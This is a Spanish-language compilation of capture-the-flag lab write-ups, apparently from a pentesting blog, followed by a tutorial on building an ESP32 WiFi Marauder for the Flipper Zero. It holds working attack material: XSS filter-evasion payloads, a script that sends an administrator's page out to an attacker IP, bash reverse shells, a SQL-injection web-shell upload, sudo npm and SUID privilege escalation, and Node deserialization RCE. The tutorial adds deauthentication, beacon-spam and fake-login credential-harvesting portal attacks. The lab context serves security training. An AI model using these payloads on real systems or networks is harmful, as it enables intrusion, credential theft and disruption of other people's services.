file_put_contents("/var/www/html/dev_wiki/hijack.txt", $_POST['log'] . " : " . $_POST['pwd'], FILE_APPEND);

Ahora tocaría esperar a que los comandos se ejecuten y se deposite el fichero. Estaremos realizando una petición a este fichero de manera constante:

watch -n 1 curl -s -X GET http://10.10.10.78/dev_wiki/hijack.txt

Y luego de esperar un poco se almacenan credenciales para el usuario Administrator en el fichero hijack.txt:

Las reutilizaremos con el usuario cliff:

Y no funcionan. Las probamos con el usuario root:

Y somos usuario root con el cual podremos leer las flags.

Pwned! 🏴‍☠️

Reconocimiento Inicial

Como siempre iniciamos con un scan para detectar puertos abiertos en el host victima:

nmp -sS --min-rate 1500 -p- --open -vv -n -Pn 10.10.10.25

Podemos ver que el resultado nos entrega el puerto 22 y 8000 abiertos. Realizamos otro scan para detectar más los servicios y las versiones sobre estos puertos:

El resultado es SSH y un servicio HTTP de Node.JS en el puerto 8000.

Reconocimiento Web

Al ingresar a la web solo vemos la imagen de un hexagono:

Si intentamos ingresar a la ruta de la imagen veremos lo siguiente:

Al interceptar la petición y cambiar el método por POST seguiremos obteniendo el mismo mensaje:

Fuzzing

Como no tenemos mucho más que ver por esta parte realizaremos fuzzing para encontrar directorios que estén ocultos. Para esta ocasión utilizamos la herramienta de fuzzing dirsearch ya que está incluye la cabecera User-Agent por defecto. Otras herramientas como wfuzz o gobuster no funcionarán ya que no la incluyen por defecto y tendríamos que agregarla como payload. Ya que la aplicación web está validando esta cabecera:

Como vemos encontramos diversas rutas como login y admin. está ultima redirige a login al igual que logout:

Observamos que al ingresar claves por defecto se muestra el mensaje de Invalid User. Lo que puede servir en principio para enumerar usuarios existentes en el sistema y también para poder identificar un potencial vector de inyección SQL:

SQLi

Para probar la inyección SQL interceptaremos la petición POST del login para poder modificarla en el Repeater de BurpSuite. Si ingresamos una comilla simple (’) podremos ver que sigue apareciendo el mensaje de Invalid User:

Pero si ingresamos una doble comilla el mensaje será de Error Ocurred:

En base a esto podemos generar una consulta con doble comilla de tipo boolean típica para realizar un bypass del login tal como " OR "5"="5 :

Podemos observar que para esta consulta el error es distinto otra vez. Ahora se muestra el mensaje de Incorrect Password y al observar en el campo de username podemos ver el valor reflejado de RickA. Lo que nos muestra el usuario en uso.
En base a esto y ya confirmada la vulnerabilidad realizamos un ordenamiento por columnas:

Vemos que se ve el mensaje de Error Ocurred al realizar un ordenamiento por 5 columnas, Realizaremos esto por 100 columnas para determinar el comportamiento de la web:

Y observamos que seguimos obteniendo el mismo mensaje de error. Por lo que quizás al acertar la columna se muestre otro mensaje como Incorrect User. Para esto debemos modificar la consulta, como no obtenemos resultados agregamos paréntesis en la consulta por la parte de la comilla y cambiando el numero de las columnas:

Y vemos que cerrando con doble paréntesis y realizando un ordenamiento por la cuarta columna vemos el mensaje de Invalid User lo que puede significar que la tabla contiene 4 columnas:

Realizamos la petición con el usuario encontrado para confirmarlo:

→ Obteniendo información:

Ya que confirmamos la cantidad de columnas podemos realizar un ataque de tipo UNION y buscar en donde se refleja el valor de la consulta:

Para este caso el valor 2 se refleja en el valor del campo username. Podemos asegurarnos de esto enviando una cadena:

Lo primero antes de continuar es determinar la versión de la base de datos en uso para construir ataques en base a este motor de base de datos. Al probar las variantes para detectar la versión notamos que estamos ante el motor de base de datos SQLite en su versión 3.15.0:

Para extraer las tablas de la base de datos en uso realizamos la siguiente consulta:
Como se ve en la respuesta obtenemos las tablas username, notes, bookimgs y sessions.

Para extraer las columnas las tablas de la base de datos utilizamos la siguiente consulta. Para este caso será la tabla users:

Observamos que la tabla contiene las columnas username y password. Para el resto de tablas las columnas son las siguientes:

Realizando la siguiente consulta podemos obtener la contraseña del usuario RickA la cual esta hasheada:

Podemos utilizar un servicio online como crackstation para crackear esta contraseña la cual está en formato MD5:

Y tenemos una contraseña para iniciar sesión la cual es nevergonnagiveyouup la cual corresponde al usuario RickA. Podemos:

Posterior al inicio de sesión ingresamos a cualquiera de los UUID presentes, dentro de estos podemos notar que tenemos la posibilidad de agregar una nota:

XSS + Filter Evasion

Como podemos añadir una nota la cual será revisada por un administrador podemos probar una inyección XSS con el fin de robar la cookie del administrador.

<script>alert(1)</script>

Como apreciamos se esta realizando una filtración de los símbolos < y >. Seguiremos experimentando para intentar realizar la evasión. Por ejemplo se probaron payloads con elementos img y svg. En el cual el elemento img no se bloquea:

Como sabemos que podemos utilizar el elemento img intentaremos cargar una imagen, nos pondremos a la escucha con netcat por el puerto 80 para ver como se esta realizando esta petición. Utilizamos el siguiente payload:

<img src="http://10.10.14.3/img.jpg">

Como vemos recibimos una petición GET. Ahora intentaremos crear un nuevo payload ya que hemos notado que se eliminan las doble comillas (””) por lo que intentaremos introducir la etiqueta script dentro estas doble comillas:

<img src="test><script>alert(1)</script>">

Podemos ver que efectivamente se eliminaron las doble comillas y a la vez no se han sanitizado los símbolos correspondientes para la etiqueta script. Para este caso en particular no se ha interpretado la alerta. Pero no podemos descartar que por el lado del administrador que revisa las notas se haya interpretado o no.

Cookie Hijacking

Como se aprecia a continuación contamos con una cookie de sesión:

La idea será robar la del usuario administrador que valida nuestras notas para suplantar su sesión. Es importante considerar que al momento de realizar la llamada a document.cookie NO se muestra la cookie de sesión en esta llamada:

Por lo que el enfoque será enviar un payload el cual redireccione al administrador a un servidor controlado para obtener la cookie y recibirla de la siguiente manera:

<img src="test><script>document.location("http://IP/?cookie=' + document.cookie + '")</script>

Observamos que se nos están bloqueando nuevamente los símbolos. Podemos pensar que esto sucede al haber agregado document.location por lo que modificamos el payload para poder evadir estos filtros. Para este intento reemplazamos document.location por document.write de la siguiente forma:

<img src="test><script>document.write('<script src="http://10.10.14.3/evil.js"></script>')</script>">

Nos fijamos que al inicio ya no quita los símbolos pero si nos quita un espacio en la sección interna de document.write en especifico en script src lo cual deja como scriptsrc y luego elimina parte del contenido para volver a filtrar los símbolos. Podemos intentar utilizar funciones como String.fromCharCode() para realizar la evasión del filtro de caracteres.

En JavaScript, la función String.fromCharCode() se utiliza para crear una cadena de caracteres a partir de los valores Unicode especificados. Esta función toma uno o más argumentos numéricos y devuelve una cadena que contiene los caracteres correspondientes a esos valores Unicode.

La función String.fromCharCode() se llama en el contexto de la clase String. Se utiliza de la siguiente manera:

String.fromCharCode(valor1, valor2, ..., valorN);

Aquí, valor1, valor2, …, valorN son los valores numéricos de los puntos de código Unicode que se desean convertir en caracteres.

String.fromCharCode(65);
Output: "A"

En este ejemplo, el valor 65 se pasa como argumento a String.fromCharCode(), lo que devuelve la cadena "A", que es el carácter correspondiente al código Unicode 65. Para esto utilizare la siguiente herramienta para generar un payload de este tipo de manera más eficiente:

Copiamos el payload resultante y lo fusionamos con el payload anterior de la siguiente forma:

<img src="test><script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,49,48,46,49,48,46,49,52,46,51,47,101,118,105,108,46,106,115,34,62,60,47,115,99,114,105,112,116,62,39,41,59));</script>">

Lo añadimos y enviamos:

Y nos ponemos en escucha en un servidor con python3 para ver si se efectúa la petición:

Y vemos que efectivamente la petición llega.

→ Fichero malicioso

El objetivo ahora es almacenar un fichero malicioso con el objetivo de que se solicite como recurso por el usuario administrador con el fin de observar el código fuente de este con el objetivo de buscar algún parámetro distinto con el cual poder robar la cookie:

var req1 = new XMLHttpRequest();
req1.open('GET', 'http://localhost:8000/vac/8dd841ff-3f44-4f2b-9324-9a833e2c6b65', false);
req1.send();

var response = req1.responseText;

var req2 = new XMLHttpRequest();
req2.open('POST', 'http://10.10.14.3:1337/evil', true);
req2.setRequestHeader('Content-Type', 'text/plain');
req2.send(response);

Al almacenar el script en un servidor HTTP con Python3 y ponernos en escucha en este caso en el puerto 1337 con netcat recibimos el código fuente de la web en este caso la que ve el usuario administrador:

Podemos notar como se expone un campo oculto “cookie” con el valor de connect.sid=s%3A1bee6850-7eba-11ee-97fe-c3fb22230dd2.VBSZXnrWknhgjq%2FAelc8T45pbwNd8%2FI%2B54YiIB%2BeIiA.

Reemplazamos este valor en nuestro navegador y notamos que al actualizar la página impersonamos la cuenta del usuario Admin:

RCE

Ya que tenemos acceso al panel de administración podemos observar que tenemos la función de de aprobar las notas:

Enviaremos una nota de prueba para poder aprobarla y observar como se efectúan estas peticiones:

Al presionar en Approve el flujo del sitio nos muestra la siguiente página:

Vemos que se muestra un apartado para exportar Bookings y Notes. Al presionar en cualquiera de estos mientras interceptamos la petición con BurpSuite vemos lo siguiente:

Al seguir la petición se descarga un fichero con los Bookings. Intentamos modificar el parámetro bookings con algún símbolo para detectar cambios en el flujo:

Vemos que al agregar el símbolo < se produce un error el cual nos revela que solo se aceptan los caracteres del siguiente rango: [a-z0-9&\s\/]. En ciertas ocasiones el símbolo o carácter & se utiliza para concatenar comandos, por lo que intentamos aprovecharnos de este para probar inyectar un comando:

No parece funcionar, así que lo transformamos en formato URL el cual corresponde a %26:

Y como se aprecia tenemos ejecución de comandos. Nos aprovecharemos de esto para ejecutar una reverse shell.

Shell as algernon

Ya que tenemos una forma de ejecutar código intentaremos depositar un script en bash para realizar el proceso de reverse shell. Primero veremos si contamos con wget para descargar ficheros:

Y contamos con wget para descargar ficheros, tomemos en cuenta que se agrego %20 lo que representa un espacio. Depositaremos el siguiente script y lo compartiremos con un servidor simple de python para descargarlo utilizando wget:

#!/bin/bash

bash -c "bash -i >& /dev/tcp/<IP>/<PORT> 0>&1"

Ahora utilizamos wget para descargar el script. Pero nos encontramos con el primer problema el cual es el formato de la IP sabemos que tenemos caracteres restringidos entonces no podemos utilizar puntos.

Podemos utilizar el siguiente script para convertir una dirección IP en distintos formatos con el cual podríamos aprovecharnos:

Como se aprecia podríamos utilizar el formato Decimal y Hexadecimal entregado por el script. Se evidencia que si se realiza un ping a uno de estos se resuelve la dirección IP ingresada en el script. Vamos a probarlo:

Vemos que tenemos un código de estado 200, comprobamos que el script se descargo ejecutando ls:

Desde ya nos ponemos en escucha con netcat en el puerto indicado en el script. Para este caso es el 443:

Ejecutamos el script:

Y ganamos acceso:

Privesc

Para escalar privilegios podemos verificar que comandos podemos ejecutar como sudo con sudo -l:

Y podemos ejecutar el comando npm i como sudo. Aprovecharnos del siguiente recurso que nos explica como poder elevar privilegios. Según las instrucciones debemos ejecutar la siguiente serie de comandos:

TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i

Debemos adecuarlo a la ruta especificada:

Con esto ya podemos leer las flags y resolveremos el laboratorio.

Pwned! 🏴‍☠️

Reconocimiento inicial

Como siempre comenzamos con un scan para detectar los puertos abiertos en el host victima:

nmap -sS --min-rate 1500 -p- --open -n -Pn 10.10.10.85

Como se aprecia solo se encuentra el puerto 3000 abierto. Realzamos otro scan para obtener los servicios y versiones que se están utilizando en ese puerto:

nmap -sCV -p3000 10.10.10.85

Y observamos que corresponde a un servicio web en el cual se esta utilizando Node.js Express framework. Con esto presente ingresamos a la web para visualizar el contenido de esta.

Reconocimiento web

Vemos que al ingresar se muestra el mensaje Hey Dummy 2+2 is 22: Luego de enumerar un poco notamos que la web no tiene nada más que esto. Observando las cookies de sesión encontramos un valor parecido a un JWT pero en realidad es un valor en base64 ya que no contiene los puntos de la firma de un JWT normal:
Al decodificar el valor en base64 notamos que es un objeto que esta serializado:
Si tomamos estos valores y los modificamos como por ejemplo el valor de username y lo enviamos en la cookie de sesión podemos ver que efectivamente cambian:

Node JS Deserialization Attack

Buscando damos con el siguiente post:
Exploiting Node.js deserialization bug for Remote Code Execution

El cual explica un método en el cual es posible realizar una ejecución remota de comandos mediante la explotación de deserialización insegura en node.js. En el cual se nos explica que:

Los datos no confiables pasados a la función unserialize() en el módulo node-serialize pueden ser explotados para lograr la ejecución arbitraria de código pasando un objeto JavaScript serializado con una expresión de función invocada inmediatamente (IIFE) Immediately invoked function expression.

→ Construcción del Payload

Para construir el payload es necesario contar con la librería de node.js node-serialize. Está la podemos instalar con npm:
Al ejecutarlo observamos que nos crea el objeto:

Como menciona el post, Ahora tenemos una cadena serializada que puede ser deserializada con la función unserialize(). Pero el problema es que la ejecución del código no ocurrirá hasta que disparemos la función correspondiente a la propiedad rce del objeto.

Más tarde descubrí que podemos usar la expresión de función invocada inmediatamente (IIFE) de JavaScript para llamar a la función. Si usamos el doble paréntesis de IIFE () después del cuerpo de la función, la función será invocada cuando el objeto sea creado. Funciona de forma similar a un constructor de clase en C++.

Ahora se llama a la función serialize() con el código del objeto modificado:
La vulnerabilidad en la aplicación web es que lee la cookie de la petición HTTP, realiza la decodificación base64 del valor de la cookie y lo pasa a la función unserialize(). Como la cookie es una entrada no confiable, un atacante puede crear un valor de cookie malicioso para explotar esta vulnerabilidad.

Shell as Sun

Para agilizar la explotación podemos utilizar la herramienta nodejsshell.py para obtener una reverse shell:
Copiamos el payload entregado y lo reemplazamos en el primer script de la siguiente forma:
Desde ya nos ponemos en escucha:
Y codificamos el payload en base64 para enviarlo en la cookie:
Observamos que ya tenemos acceso:

Privesc

Al recibir la conexión notamos que estamos en el directorio del usuario sun. Dentro de este notamos el fichero output.txt:
El cual si observamos podemos notar el mensaje de: Script is running... Pero no sabemos que script. Además notamos que el output es generado por el usuario root:

Detectando procesos con Pspy

En base al fichero detectado podemos pensar que se esta ejecutando un script que no podemos detectar. Para esto utilizaremos la herramienta pspy la cual debemos transferir a la maquina victima:
Le damos permisos de ejecución y la ejecutamos. Y luego de esperar por un rato podemos observar que el UID 0 correspondiente al usuario root, está ejecutando el siguiente comando:
Vemos que root ejecuta el script script.py en el directorio Documents del usuario sun para luego depositar el fichero output.txt. Al observar el contenido del script podemos ver que simplemente ejecuta un print de “Script is running…” por lo que realmente no hace nada. Pero lo curioso de esto es que el propietario del script es el usuario que ya tenemos comprometido:
En base a esto podemos modificar el script para que se cambie el permiso de la /bin/bash a SUID:
Ahora debemos esperar a que el usuario root ejecute el script para poder cambiar el permiso de la /bin/bash y escalar privilegios al usuario root:

Shell as root

Ya con permiso SUID en la bash podemos utilizar el parámetro -p para ejecutarla con permisos de root:
Con esto ya podemos leer la flag del usuario root.

Pwned! 🏴‍☠️

Reconocimiento Inicial

Como siempre para comprobar que tenemos conexión entre nuestra maquina de atacante y el host victima enviamos una traza ICMP. Comprobamos de que el host se encuentra activo:

A continuación realizamos un scan con nmap para visualizar los puertos que se encuentren abiertos en el host:

Tenemos el puerto 22, 80 abierto. Realizamos otro scan con nmap para detectar la versión de los servicios:

Reconocimiento Web

El scan anterior revelo que el puerto 80 esta habilitado utilizando un servidor nginx. Podemos ingresar a este desde el navegador web:

Vemos que tenemos un panel de Login. Intentamos realizar las típicas comprobaciones de usuarios y contraseñas por defecto como test;test:

Esto nos entrega el mensaje de Invalid Username, lo que puede ser un mensaje genérico que nos permita enumerar usuarios. Ahora probamos con admin;admin:

En este caso vemos que el mensaje es Invalid Password. Además vemos un botón de Forgot Password? que al presionar observamos que se nos solicita un usuario. Utilizaremos el de admin en este caso ya que sabemos que es un usuario que existe:

Al presionar en submit se nos redirige a http://10.10.11.159/reset en donde se nos muestra el mensaje de “Enter the pincode emailed to you”. Lo que nos indica que se nos ha enviado un código PIN al email:

Al probar con el código 1234 el cual resulta ser invalido se nos muestra el mensaje “Invalid Pincode. Be sure to use the same browser you requested from.”. Si observamos la petición submit proxeada con BurpSuite podemos identificar que esta petición arrastra 2 cookies laravel_session y XSRF-TOKEN:

PIN Brute Force

Observamos que se realiza una petición con el método POST en /api/resettoken. Utilizamos Intruder para recorrer el pin desde el 0000 al 9999 para poder obtenerlo mediante fuerza bruta:

Pero vemos que luego de algunas peticiones el código de estado es 429. Lo que significa que hemos realizado demasiadas peticiones.

Rate Limit Bypass

Existen diversas formas de realizar un bypass cuando el servidor bloquea nuestras peticiones, pero mi favorita es utilizar la cabecera X-Forwarded-For para hacer pasar la petición original por otra IP. Lo ideal es tener un diccionario de IPs para poder irlas rotando en la cabecera X-Forwarded-For. Podemos crear un diccionario de IPs con el siguiente script en python:

for i in range(51):
    for j in range(251):
        print(f"10.10.{i}.{j}")

En el diccionario ya contamos con más de 12000 ips distintas para realizar el ataque. Utilizaremos Intruder de BurSuite para realizar un ataque de tipo Pitchfork sobre /api/resettoken en la cual agregaremos la cabecera X-Forwarded-For con un valor aleatorio que recorreremos con el diccionario creado y además recorreremos nuevamente la lista de posibles PIN:

Configuramos el payload 1 seleccionado el tipo en Simple list y cargamos el diccionario en Load:

El Payload 2 lo configuramos igual al primer ataque realizado con Intruder:

Iniciamos el ataque y observamos que ahora todas las peticiones son código de estado 200

Al finalizar el ataque podemos identificar que tenemos una petición con una longitud inferior a la del resto el cual corresponde al PIN 9933:

Si seguimos esta petición en el navegador podemos observar que ahora somos capaces de cambiar la contraseña. Para este caso la contraseña sera “h4rri”:

Y al dar a Submit observamos que hemos cambiado la contraseña ya que se refleja el mensaje “Password Changed”

Login as Admin

Ahora si utilizamos las credenciales para iniciar sesión podremos ver que lo hacemos como el usuario admin:

Al presionar en view en cualquier Profile se nos muestra un mensaje correspondiente al perfil del usuario:

Al observar las peticiones de esta interración en Burp nos fijamos que se revela el campo id y secret que se están obteniendo mediante GET:

Enviaremos esta petición al Repeater para modificar ambos campos, Al hacer esto observamos que se nos muestra el mensaje de “Tampered user input detected”:

Al modificar cualquiera de los dos campos se presenta el mensaje de error de la captura anterior. Lo que me indica que algo esta detectando que los campos se están modificando. Podemos probar cambiando el método de GET a POST:

Al realizar esto observamos un mensaje de error en formato json con esto en mente adaptamos el formato a json y cambiamos también el contenido de la cabecera Content-Type:

Vemos que el mensaje de error sigue siendo el mismo, probaremos cambiando al método GET nuevamente:

Y como se ve ahora si se visualizar el contenido original de la respuesta. Además hay que tener en cuenta que los datos se están enviando en formato json. Si volvemos a modificar los datos con el formato entregado veremos lo siguiente:

Por lo que debemos realizar una evasión sobre estas validaciones.

Type Juggling

Si pensamos en como esta construido el código del servidor debemos saber que lenguaje esta utilizando. Para esto generalmente utilizo Wappalyzer o whatweb para CLI:

Y vemos que la aplicación utiliza como lenguaje de programación PHP. Realizando pruebas sobre los parámetros agregando datos debemos determinar si esa comparación se hace con == y no ===, el Type Juggling evitaría la comprobación. Probamos cambiar secret a true:

Acabamos de abusar de esta característica al manipular los datos de entrada de una aplicación PHP para realizar comparaciones que resulten en valores inesperados o falsos positivos, lo que puede conducir a vulnerabilidades de seguridad como la inyección de SQL o la omisión de autenticación. Incluso se acepta como cadena. Lo que refuerza la probabilidad de SQL Injection:

SQL Injection

Modificaremos el valor del parámetro id para ingresando una comilla simple para detectar si se produce algún error de sintaxis de SQL:

Como vemos se produce un error y el servidor responde con un código de estado 500. Realizamos un ordenamiento por columnas para determinar la cantidad de estas en la tabla:

Como se aprecia al ordenar por 4 el error persiste. Caso contrario si ordenamos por 3 volveremos a visualizar el texto del perfil en cuestión:

Desde este punto podemos probar realizando una inyección SQL basada en UNION:

La sintaxis funciona pero no vemos reflejado ninguno de los 3 valores. Observamos que si cambiamos el valor 8 del id por una cadena envuelta en comillas simples vemos reflejado el valor 3:

"'H4RR1' UNION SELECT 1,2,3-- -"

Enumeración de la BD

Vemos que la base de datos en uso es uhc:

Ahora enumeraremos las tablas de esta base de datos:

UNION SELECT 1,2,GROUP_CONCAT(table_names) FROM information_schema.tables WHERE table_schema='uhc'

Y vemos la tabla de interés users. Por lo que procedemos a enumerarla:

UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'users'

Desde este punto creamos una query para extraer el contenido de las columnas name y password:

UNION SELECT 1,2,GROUP_CONCAT(name,':',password,'\n') FROM uhc.users-- -

big0us:$2y$10$L3X8m6P1w.F2aO011ffWr.587vGCYeFXuXwE2vr3DbrYkcuF741N2
,celesian:$2y$10$8ewqN3lE9iazbo8sFiwUleeNIbOpAMRcaMzeiXJ50wlItN2Kd5pI6
,luska:$2y$10$KdZCbzxXRsBOBHI.91XIz.O.lQQ3TqeY8uonzAumoAv6v9JVQv3g.
,tinyb0y:$2y$10$X501zxcWLKXf.OteOaPILuhMBIalFjid5bBjBkrst/cynKL/DLfiS
,o-tafe:$2y$10$XIrsc.ma/p0qhvWm9.sqyOnA5184ICWNverXQVLQJD30nCw7.PyxW
,watchdog:$2y$10$RTbD7i5I53rofpAfr83YcOK2XsTglO01jVHZajEOSH1tGXiU8nzEq
,mydonut:$2y$10$7DFlqs/eXGm0JPVebpPheuEx3gXPhTnRmN1Ia5wutECZg1El7cVJK
,bee:$2y$10$Furn1Q0Oy8IbeCslv7.Oy.psgPoCH2ds3FZfJeQlCdxJ0WVhLKmzm
,admin:$2y$10$37Q1SanFMybo1MXUncgI1uYt5G1KdqaHMWlBjcY7i63aGcluXNrfu

Vemos que las contraseñas estan hasheadas. No probaremos crackearlas e intentar ingresar por SSH.

Leyendo ficheros internos

Podemos enumerar ficheros internos con la vulnerabilidad de SQLi mediante el comando LOAD_FILE

UNION SELECT 1,2,LOAD_FILE('/etc/passwd')-- -

Podemos probar enumerar la clave privada de SSH del usuario:

Web Shell via SQLi

Podemos probar una técnica para subir una web shell desde la consulta SQL. Primero debemos saber en que ruta reside el servidor, sabemos que el servidor es un nginx. Entonces podemos probar con rutas de servidores nginx como /etc/nginx/sites-enabled/default:

Observamos que se revela la ruta /srv/altered/public. Quiero pensar que tengo permiso de escritura por lo que subire una webshell de la siguiente forma:

UNION SELECT 1,2,<?php system($_REQUEST[\"cmd\"]); ?> into outfile '/srv/altered/public/wse.php'-- -

Al ingresar en la url el nombre asignado a la webshell “wse.php” observamos que se reflejan los valores 1, 2 y el valor donde debería ir 3 se ve vacío:

Pasamos el parámetro cmd por la url y podremos ejecutar comandos:

Reverse shell as www-data

Ya que podemos ejecutar comandos utilizare una reverse shell simple en bash:

bash -c "bash -i >& /dev/tcp/10.10.14.24/443 0>&1"
Posteriormente la URL-Encodeamos:
%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%34%2e%32%34%2f%34%34%33%20%30%3e%26%31%22

Al enviar el comando en el navegador y al estar a la escucha con netcat vemos que recibimos la shell:

Tratamiento TTY

Para avanzar cómodamente realizaremos el tratamiento de la tty para obtener una consola interactiva. Escribimos la siguiente secuencia de comandos para poder obtener una consola interactiva o fully tty:

script /dev/null -c bash
Ctrl+Z
stty raw -echo;fg
reset xterm
export TERM=xterm
export SHELL=bash

Escalando privilegios

Para escalar privilegios en un host linux podemos utilizar herramientas como LinPeas para automatizar esta parte. Generalmente comienzo por enumerar el kernel del sistema:

Vemos que la versión de kernel es la 5.16.0.-051600-generic. Si buscamos exploits relacionados a este encontraremos el CVE-2022-0847 el cual corresponde a una escalada local de privilegios (Dirty Pipe).

Buscando un exploit podemos dar con el siguiente, que requiere de un SUID para funcionar: Exploit

Ahora debemos buscar permisos SUID en binarios del sistema:

find / -perm -4000 2>/dev/null

Podemos ver que esta el binario de pkexec. Con el cual podemos intentar aprovecharnos para escalar privilegios. Descargamos el exploit en nuestra maquina de atacante y lo compilamos con gcc -o exploit-2 exploit-2.c:

Ahora montamos un servidor con python para poder descargarlo en el host victima:
Ahora le damos permisos de ejecución al binario y lo ejecutamos llamando el SUID /usr/bin/pkexec::
Con esto conseguimos ser usuario root y leer la flag:

Pwned! 🏴‍☠️

En este artículo, examinaremos el proceso para desarrollar un WiFi Marauder utilizando la placa de desarrollo ESP32. Posteriormente veremos como utilizarla para realizar ataques como Deauth, Beacon Spam y Evil Portal.

Requisitos

Hardware

• Placa de Desarrollo ESP32: La pieza central de nuestro proyecto.
• Cables Dupont Macho-Hembra (x4): Estos cables serán esenciales para establecer las conexiones necesarias entre la placa ESP32 y el Flipper Zero.

En mi caso compre estas piezas por AliExpress. A continuación proporcionare los enlaces de la tienda en donde adquirí los productos.

Enlaces de Compra:

• Placa de Desarrollo ESP32
• Cables Dupont Macho-Hembra

Otros requerimientos

Instalaremos el controlador CP210x desde aquí para que el dispositivo sea reconocido. Para este caso utilizaremos el de Windows.

Además utilizaremos la aplicación QFlipper para agregar y modificar ficheros.

También debemos tener python instalado en el sistema. En mi caso lo instalé desde la Microsoft Store.

Adicionalmente debemos tener instalado Git en el equipo. El cual descargué desde aquí.

Finalmente es recomendable utilizar el firmware Unleashed el cual contiene los modulos de ataque con el ESP32 para GPIO pre-instalados.

Flashing ESP32 - Marauder

El primer paso será flashear el ESP32, para esto clonaremos el repositorio FZEasyMarauderFlash para poder flashear la placa. Una vez clonado el repositorio debemos instalar las dependencias de este utilizando pip:

pip install -r requirements.txt

Ahora conectamos la placa por USB al equipo. Ya conectada debemos configurarla en modo escritura. Para hacer esto debemos mantener presionado los botones de BOOT y RESET:

Soltando el botón de RESET(1) y manteniendo presionado el botón de BOOT(2) ejecutaremos el script EasyInstall.py. En mi caso lo hare desde Visual Studio Code:

Ya ejecutado el script, sin soltar el botón de BOOT(2) seleccionaremos la opción correspondiente para nuestra placa, en este caso será la opción 5:

A lo largo de la ejecución del script no debemos soltar el botón de BOOT(2) o puede que la placa no se flashee bien. F por nuestro dedo

Ahora solo debemos esperar a que el script finalice y nos muestre el siguiente mensaje:

Con esto ya podremos realizar los ataques de Deuth y Beacon Spam. Pero primero debemos conectar la placa al Flipper Zero.

Esquema de Conexión

Para poder utilizar la placa en el Flipper Zero debemos seguir el siguiente esquema de conexión en el cual utilizaremos los cables dupont:

Una vez conectados al Flipper Zero el led del ESP32 se ilumina lo que significa que se está alimentando correctamente. La conexión se vera de la siguiente forma:

Desde este punto ya podemos realizar los primeros ataques.

Deauth Attack

Una vez que la placa ESP32 está debidamente configurada con el firmware necesario, podemos avanzar hacia la implementación del ataque de desautenticación. El ataque de desautenticación (Deauth Attack) se utiliza para desconectar dispositivos específicos de una red WiFi, creando una oportunidad para el análisis y monitoreo.

Bien, lo primero para realizar este ataque es tener un objetivo. En mi caso he levantado una red de prueba llamada Frontier. Con esto en mente, en el Flipper Zero nos dirigimos a Apps > GPIO y seleccionamos [ESP32] WiFi Marauder:

Ahora para detectar la Red seleccionamos la opción de Scan con la opicón de ap para escanear los puntos de acceso:
Observamos que se ha escaneado el AP Frontier y un total de 3 puntos de acceso.

Ya que tenemos escaneado nuestro objetivo tenemos que seleccionarlo, para ver que posición es la que ocupa podemos ingresar en la opción de List con la opción de ap:

Como se aprecia nuestro AP objetivo es el número 0. Para seleccionarlo debemos utilizar la opción de Select con la opción de ap de la siguiente forma:

Finalmente para realizar el ataque debemos utilizar la opción de Attack con la opción de deauth como se muestra a continuación:

Con en esto nuestro Flipper Zero ya estará enviando paquetes para desautenticar a los dispositivos conectados a la red Frontier:

Así mismo se nos desautentican otros equipos conectados e impide conectarse a la red:

Beacon Spam Attack

Ahora que sabemos como utilizar el Flipper Zero para realizar ataques de deautenticación pasaremos a Beacon Spam. Con este ataque podemos inundar la red con puntos de acceso falsos con el fin de saturarla.

Como hicimos anteriormente, utilizaremos la aplicación de [ESP32] WiFi Marauder:

Contamos con 2 tipos de configuraciones:

• Añadir una lista de SSID random.
• Añadir un SSID con un nombre especifico.

Random SSID

Para realizar el ataque con una lista de SSID randoms debemos seleccionar la opción de SSID con la configuración de add rand:

A continuación debemos seleccionar una cantidad para generar, en este caso utilizare 30:

Con estos 30 SSID ya generados podemos realizar el ataque de spam. Para esto seleccionamos la opción de Beacon Spam con la configuración de ssid list:

Con en esto nuestro Flipper Zero ya estará realizando el spam de SSID para inundar la red:

Lo mismo sucederá en otros dispositivos:

Single SSID

Para este caso debemos seleccionar la opción de SSID con la configuración de add name. En este caso el nombre que agregare es google:

Con este SSID ya configurado realizaremos el ataque de spam. Para esto seleccionamos la opción de Beacon Spam con la configuración de ssid list:

Con en esto nuestro Flipper Zero ya estará realizando el spam del SSID configurado:

Evil Portal

Ya hemos aprendido como desautenticar equipos de la red y como crear puntos de acceso falsos utilizando el ESP32. A continuación y para finalizar aprenderemos como desplegar un portal malicioso. Cuando los usuarios intenten conectarse a este punto de acceso, se les mostrará una pantalla de inicio de sesión falsa. Las credenciales de usuario se envían al Flipper y se registran en la tarjeta SD.

Cabe destacar que para poder hacer uso del Evil Portal debemos flashear nuevamente la placa. Para esto haremos uso del script utilizado anteriormente.

Flashing ESP32 - Evil Portal

Utilizaremos el repositorio FZEasyMarauderFlash ya clonado para poder flashear la placa. Tengamos en cuenta que debemos conectar la placa al equipo y configurarla en modo escritura como hicimos anteriormente.

Ya ejecutado el script, sin soltar el botón de BOOT(2) seleccionaremos la opción correspondiente para nuestra placa, en este caso será la opción 14 para Evil Portal:

Recordemos que a lo largo de la ejecución del script no debemos soltar el botón de BOOT(2) o puede que la placa no se flashee bien. F por nuestro dedo nuevamente.

Ahora solo debemos esperar a que el script finalice y nos muestre el siguiente mensaje:

Con esto ya podremos realizar el ataque de Evil Portal. Pero primero debemos instalar la aplicación en nuestro Flipper Zero.

Instalando Evil Portal - Facil + Manual

→ Primeros pasos

Para instalar la aplicación de Evil Portal utilizaremos el repositorio flipper-zero-evil-portal. Esta vez lo descargamos como zip.

Para esto ingresamos al repositorio, presionamos en Code y finalmente Download ZIP:

Lo primero que haremos es transferir los ficheros que se encuentran en la carpeta evil_portal del repositorio descargado.

Antes de transferirlos explicare brevemente la estructura de estos ficheros.

• ap.config: Este fichero se encarga de mostrar el nombre del punto de acceso, podemos decir que aquí se configurará el SSID.
  

• index: el fichero index básicamente es el html que se cargara al momento de que el usuario se conecte a la red, para este primer ejemplo se desplegara un login correspondiente a Google. Más adelante explicare como cambiarlo.

Además crearemos una carpeta nueva llamada logs la cual estará vacía:

Teniendo esto en cuenta movemos la carpeta evil_portal en la carpeta apps_data ubicada en la SD Card.

Ahora podemos continuar e instalar la aplicación.

